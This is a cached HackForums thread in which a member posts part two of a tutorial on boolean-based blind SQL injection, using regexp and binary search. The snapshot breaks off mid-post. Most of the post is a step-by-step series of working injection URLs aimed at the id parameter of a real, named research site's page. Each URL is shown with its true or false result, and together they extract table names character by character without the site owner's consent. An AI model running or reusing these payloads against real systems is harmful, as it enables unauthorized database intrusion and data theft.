<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3387210" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3387210" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3387210</a>. It is a snapshot of the page as it appeared on 31 Mar 2014 08:31:01 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3387210" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:Dppr4QE16ycJ:www.hackforums.net/showthread.php%3Ftid%3D3387210&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[Tutorial] boolean based blind SQLi using regexp with binary search - part #2 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[Tutorial] boolean based blind SQLi using regexp with binary search - part #2"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3387210"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-31-2014, 12:30 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[Tutorial] boolean based blind SQLi using regexp with binary search - part #2</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3387210" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/rating.js"></script><div id="success_rating_3387210" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3387210"><li style="width: 0%" class="current_rating" id="current_rating_3387210">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387210&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387210&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387210&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387210&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387210&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3387210" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3387210_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3387210" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3387210&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3387210");
// -->
</script><div><strong>[Tutorial] boolean based blind SQLi using regexp with binary search - part #2</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid31772710" id="pid31772710"></a><table class="tborder" style="border-top-width: 0; " id="post_31772710" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-07-2013, 06:38 AM <span id="edited_by_31772710"><span class="smalltext">(This post was last modified: 04-12-2013 09:34 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387210&amp;pid=31772710#pid31772710">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img title="" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,182<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31772710">This tutorial has five parts. This is part <span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">#2</span></span></span><br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3385306" target="_blank">part #1</a>
 we learned about binary search and regexp. We also learned how to test 
for vulnerability, test for version(), count number of databases and 
number of tables in database() and what is result <span style="color: #32CD32;">true </span>and what <span style="color: #FF4500;">false </span>using boolean based blind SQLi. Let's continue with searching for characters in table names.<br><br>For part <span style="font-size: medium;"><span style="color: #32CD32;">#2</span></span> of this tutorial I selected string based SQLi so we can easily see numbers from our calculation of middle value: <span style="color: #FFD700;">mid=(max+min)/2</span>
 in our commands (ascii values for characters in some range for 
effective binary searching)... With string based SQLi I can use syntax <span style="color: #00BFFF;">regexp '^[ascii-ascii]'</span>
 without problems as magic_quotes_gpc directive at my example site is 
turned off. In next parts of this tutorial I will use also hex converted
 regexp syntax for cases when magic_quotes_gpc directive is turned on 
and we can't use ' in our commands any more.<br><br><span style="font-weight: bold;"><span style="color: #FFD700;">Searching for first table name in database()</span></span><br><br>I want to demonstrate you searching of each character in table name <span style="color: #32CD32;">using numbers</span> as we used them in binary search game "guess a number" - see tutorial <a href="http://www.hackforums.net/showthread.php?tid=3385306" target="_blank">part #1</a>. Because of that I will use function <span style="color: #32CD32;">char(nnn)</span> where <span style="color: #FFD700;">nnn</span> will represent number (ascii value) we calculated from our formula <span style="color: #FFD700;">mid=(max+min)/2</span>. <span style="text-decoration: underline;"><span style="font-weight: bold;">This way syntax will look more complicated as it should be if we would use characters a-z A-Z and not their ascii values.</span></span> <span style="font-style: italic;">I made this <span style="color: #FFA500;"><span style="font-weight: bold;">BY PURPOSE</span> </span>for easier understanding of our math &amp; numbers using binary search.</span><br><br>So if we want to test if table name begins with character in range for example <span style="color: #00BFFF;">a - k</span> (a,b,c,d,e,f,g,i,j,k) we would use:<br><br><span style="color: #32CD32;">regexp '^[a-k]'</span>.<br><br>But
 as we will use ascii numbers instead of those letters (for easier 
understanding of our math &amp; numbers using binary search) same 
command will look like:<br><span style="color: #00BFFF;">regexp concat('^[',CHAR(97),'-',CHAR(107),']')</span> a=ascii 97 &amp; k = ascii 107 (as I mention before we will need ascii table to know ascii value for each character).<br><br><hr><br>So let's begin. <span style="color: #32CD32;">For
 the first character in table name everything will be explained so this 
part will be very detailed as we are learning basic principle. </span>Please be patient while reading. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>We
 know ascii values for table/column names can be in range 36-122. 
Allowed characters are: digits 0-9, basic Latin letters a-z A-Z, dollar,
 underscore (<a href="http://dev.mysql.com/doc/refman/5.0/en/identifiers.html%29." target="_blank">http://dev.mysql.com/doc/refman/5.0/en/i...ers.html).</a>
 Those characters have ascii values in range 36-122. If we look in ascii
 table (we will need it in this tutorial many times so bookmark <a href="http://www.asciitable.com/" target="_blank">http://www.asciitable.com</a>) we see <span style="color: #00BFFF;">$</span> has lowest ascii value <span style="color: #32CD32;">36</span> and <span style="color: #00BFFF;">z </span>has highest ascii value <span style="color: #32CD32;">122</span>. 36 and 122 will be our min and max value for first attempt in our binary search.<br><br>So using our formula <span style="color: #FFD700;">mid=(max+min)/2</span> we can calculate our first mid value: (122+36)/2 = 79.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 1</span> - ascii range to search: 36 - 122; mid=79</span><br>Let us try if first character in table name has ascii value in upper half of possible initial range 36-122. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^[',CHAR(79),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>We received result <span style="color: #32CD32;">true</span>
 so let's change our min value to 79 as we know first letter is in range
 79-122. After we recalculate our formula mid=(max+min)/2 --&gt; 
(122+79)/2=101 (100.5 rounded up to 101) we get new mid value 101 for 
our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 2</span> - ascii range to search: 79 - 122; mid=101</span><br>Let's test if our character is in upper half of our latest range 79-122 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^[',CHAR(101),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>We get result <span style="color: #32CD32;">true </span>-
 site loads fine. Let's change our min value again. This time it will be
 101 because in previous step we get result true testing ascii value of 
first character in range 101-122. After we recalculate our formula 
mid=(max+min)/2 --&gt; (122+101)/2=112 (111.5 rounded to 112) we get new
 mid value 112 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 3</span> - ascii range to search: 101 - 122; mid=112</span><br>Let's test if our character is in upper half of our latest range 101-122 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^[',CHAR(112),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>Site loads OK again so result for our test is <span style="color: #32CD32;">true</span>.
 Let's change our min value again. This time it will be 112. After we 
recalculate our formula mid=(max+min)/2 --&gt; (122+112)/2=117 we get 
new mid value 117 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 4</span> - ascii range to search: 112 - 122; mid=117</span><br>Let's test if our character is in upper half of our latest range 112-122 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^[',CHAR(117),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>We get result <span style="color: #FF4500;">false</span>.
 First character's ascii value is not in upper part of our range 112 - 
122, so we must search for it in lower part of our last range. Our max 
value must be modified to 117. After we recalculate our formula 
mid=(max+min)/2 --&gt; (117+112)/2=115 (114.5 rounded up to 115) we get 
new mid value 115 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 5</span> - ascii range to search: 112 - 117; mid=115</span><br>Let's test if our character is in upper half of our latest range 112-117 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^[',CHAR(115),'-',CHAR(117),']') limit 0,1)-- -</code></div></div>Site loads OK again so result for our test is <span style="color: #32CD32;">true</span>.
 Let's change our min value again. This time it will be 115. After we 
recalculate our formula mid=(max+min)/2 --&gt; (117+115)/2=116 we get 
new mid value 116 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span> - ascii range to search: 115 - 117; mid=116</span><br>Let's test if our character is in upper half of our latest range 115-117 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^[',CHAR(116),'-',CHAR(117),']') limit 0,1)-- -</code></div></div>Site loads OK again so result for our test is <span style="color: #32CD32;">true</span>.
 Let's change our min value again. This time it will be 116. After we 
recalculate our formula mid=(max+min)/2 --&gt; (117+116)/2=117 (116.5 
rounded up to 117) we get new mid value 117 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 7</span> - ascii range to search: 116 - 117; mid=117</span><br>Let's test if our character is in upper half of our latest range 116-117 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^[',CHAR(117),'-',CHAR(117),']') limit 0,1)-- -</code></div></div>We get result <span style="color: #FF4500;">false</span>. First character's ascii value is not in upper part of our range 116 - 117, so we know for sure it can be only 116. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> First character of the first table is <span style="font-weight: bold;"><span style="color: #32CD32;">t</span></span> (ascii 116). Lets remember that or better write it on the paper.<br><br><hr><br>Let's search for the <span style="color: #FFA500;">second character</span> of our first table. Our regexp command will change slightly as we will add our first letter <span style="color: #32CD32;">t</span> so regexp is<br><span style="color: #00BFFF;">regexp '^t[x-y]'</span>. For x and y value we will insert ascii values in specific range as with previous character in table name.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 1</span> - ascii range to search: 36 - 122; mid=79</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^t[',CHAR(79),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 2</span> - ascii range to search: 79 - 122; mid=101</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^t[',CHAR(101),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 3</span> - ascii range to search: 101 - 122; mid=112</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^t[',CHAR(112),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 4</span> - ascii range to search: 112 - 122; mid=117</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^t[',CHAR(117),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 5</span> - ascii range to search: 112 - 117; mid=115</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^t[',CHAR(115),'-',CHAR(117),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span> - ascii range to search: 112 - 115; mid=114</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^t[',CHAR(114),'-',CHAR(115),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span> - ascii range to search: 114 - 115; mid=115</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^t[',CHAR(115),'-',CHAR(115),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br>Our next character has ascii value 114 --&gt; <span style="color: #32CD32;"><span style="font-weight: bold;">r</span></span>. Till now we know two characters of first table name are <span style="font-weight: bold;"><span style="color: #32CD32;">tr</span></span>.<br><br><hr><br>Let's continue with searching our third character in table name. Regexp must modified to <span style="color: #00BFFF;">regexp '^tr[x-y]'</span>. For x and y value we will insert ascii values in specific range as with did with previous characters in table name.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 1</span> - ascii range to search: 36 - 122; mid=79</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^tr[',CHAR(79),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span>.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 2</span> - ascii range to search: 79 - 122; mid=101</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^tr[',CHAR(101),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span>.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 3</span> - ascii range to search: 79 - 101; mid=90</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^tr[',CHAR(90),'-',CHAR(101),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span>.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 4</span> - ascii range to search: 90 - 101; mid=96</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^tr[',CHAR(96),'-',CHAR(101),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span>.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 5</span> - ascii range to search: 96 - 101; mid=99</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^tr[',CHAR(99),'-',CHAR(101),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span>.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span> - ascii range to search: 96 - 99; mid=98</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^tr[',CHAR(98),'-',CHAR(99),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span>.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 7</span> - ascii range to search: 96 - 98; mid=97</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^tr[',CHAR(97),'-',CHAR(98),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span>.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 8</span> - ascii range to search: 97 - 98; mid=98</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp 
concat('^tr[',CHAR(98),'-',CHAR(98),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span>.<br><br>Our next character has ascii value 97 --&gt; <span style="color: #32CD32;"><span style="font-weight: bold;">a</span></span>. Till now we know three characters of first table name are <span style="font-weight: bold;"><span style="color: #32CD32;">tra</span></span>.<br><br>I am sure you get the picture how to continue. Next character will be <span style="color: #32CD32;">d</span>... so finally we will get our first table name <span style="font-weight: bold;"><span style="color: #32CD32;">traduction</span></span> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> How to know when we found complete name? With testing all founded characters so far like <span style="color: #FFD700;">regexp '^</span><span style="color: #32CD32;">traduction</span><span style="color: #FFD700;">$'</span>. Response <span style="color: #32CD32;">True</span> confirms that.<br><br><hr><br><span style="font-weight: bold;"><span style="color: #FFD700;">Testing how many tables have same first character in table name</span></span><br><br>There can be more tables starting with same character (like in our case character <span style="color: #32CD32;">t</span>). Let's check this out. After trying different numbers (greater than 1 as we know for sure at least one table starting with <span style="color: #32CD32;">t</span> is there) only this command with number 6 returns result <span style="color: #32CD32;">true</span>.<br><div 